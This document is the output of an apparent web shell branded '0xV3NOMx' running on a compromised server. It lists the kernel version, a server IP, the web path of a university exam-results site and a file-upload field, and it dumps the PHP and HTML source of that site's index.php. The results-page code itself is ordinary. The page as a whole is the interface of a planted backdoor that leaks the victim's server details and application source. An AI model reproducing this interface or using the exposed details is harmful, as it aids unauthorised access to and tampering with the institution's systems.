0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.142.36.215


Current Path : /var/www/results/jssu/
Upload File :
Current File : /var/www/results/jssu/index.php

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" />
    <?php require_once("links/js_files.php");?>
    <script type="text/javascript">
    if (location.protocol !== "https:") {
        location.replace(
            `https:${location.href.substring(location.protocol.length)}`
        );
    }

    $(function() {

        $('.index_label_div').corner("5px").css("border", "1px solid #6F6868");
        $('.messageboard-div').corner("5px").css("border", "1px solid #6F6868");
        $('.reg_no_div').corner("bl br").css("border", "1px solid #6F6868");
        $('.submit_div_button').corner("5px");
        $('.div_app_form_center_blue').corner("tl tr");
        $('.div_app_form_center_black').corner("tl tr");
        $('#print_app_form').corner("5px");
        $("#reg_no").val("");
        PopulateResultDegreeList();
    });

    function dologin(event) {
        if (event.keyCode == 13)
            ValidateRegNo();
    }
    </script>

</head>

<body>
    <div id='main_frame'>
        <div class='header_main_div'>
            <?php require_once("links/header.php");?>
            <div id='main_page_div'>
                <div id="index_main_page">
                    <div style="height:28px; padding:2px;" align='center' class="div_app_form_center_blue">
                        <a
                            style='font-family:Arial, Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 8px 0 0 8px;'>Following
                            course results are available </a>
                    </div>
                    <div id='degree_list_div'></div>
                </div>
                <div id="index_main_page_right" onkeydown="dologin(event)">

                    <div style="height:28px; padding:2px;margin-left:6px; margin-right: 5px;" align='center'
                        class="div_app_form_center_black">
                        <a
                            style='font-family:Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 5px 0 0 40px;'>Results</a>
                    </div>
                    <div class='reg_no_div' style="height:220px; padding:2px;margin-left:6px; margin-right: 5px;">

                        <div id="hTabTopmainEach">
                            <b><?php echo $_SESSION['FREGROLL'] ?> : </b><input tabindex=1 type="text" id='reg_no'
                                style="height:19px;width:195px;font-family: Arial;
                                                            padding-left: 3px; border: 1px solid #8B8B8B; font-size: 13px; color: #000000;"
                                onfocus="if(this.value=='') this.value=''" onblur="if(this.value=='') this.value=''"
                                maxlength="10" value="">

                        </div>
                        <div id="hTabTopmainEach">
                            <b>Year / Semester : </b><select tabindex=2
                                style="height:22px;width:202px;border: 1px solid #8B8B8B;" id="exam" name="ddlExam" onchange="getExamDate()">
                                <option value="none" selected="selected">Select Exam</option>
                                <option value="A">First</option>
                                <option value="B">Second</option>
                                <option value="C">Third</option>
                                <option value="D">Fourth</option>
                                <option value="E">Fifth</option>
                                <option value="F">Sixth</option>
                                <option value="G">Seventh</option>
                                <option value="H">Eight</option>
                                <option value="I">Ninth</option>
                                <option value="J">Tenth</option>

                            </select>
                        </div>

                        <div id="hTabTopmainEach" >
                            <b>Exam Date : </b>
                            <select tabindex=2 style="height:22px;width:202px;border: 1px solid #8B8B8B;" id="year"
                                name="ddlExam">
                                <option value="" selected="selected">Select Exam Date</option>
                            </select>
                        </div>

                        <div id="hTabTopmainEach">
                            <div style="background: none repeat scroll 0 0 #EECF02;
    border-radius: 5px 5px 5px 5px;
    box-shadow: 1px 1px 5px #888888;
    float: right;
    height: 22px;
    margin-right: 22px;
    padding-left: 8px;
    width: 42px;" id="print_app_form"><span tabindex=3 onclick="ValidateRegNo();"
                                    style="margin-left:8px;cursor: pointer; line-height: 19px;font-size:14px;font-weight:bold;">Go</span>


                            </div>
                        </div>

                    </div>


                    <div style="height:28px; padding:2px;margin-left:6px; margin-right: 5px;margin-top:20px;"
                        align='center' class="div_app_form_center_black">
                        <a
                            style='font-family:Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 5px 0 0 69px;'>Announcements</a>
                    </div>
                    <div class='reg_no_div'
                        style="height:auto;min-height:200px; padding:2px;margin-left:6px; margin-bottom: 6px;margin-right: 5px;"
                        id='message_board'><b>Any new / fresh / updated results shall be hosted only after 6 P.M.</b>
                    </div>

                </div>


            </div>

            <?php require_once("links/footer.php");?>

        </div>
    </div>
    </br>
</body>

</html>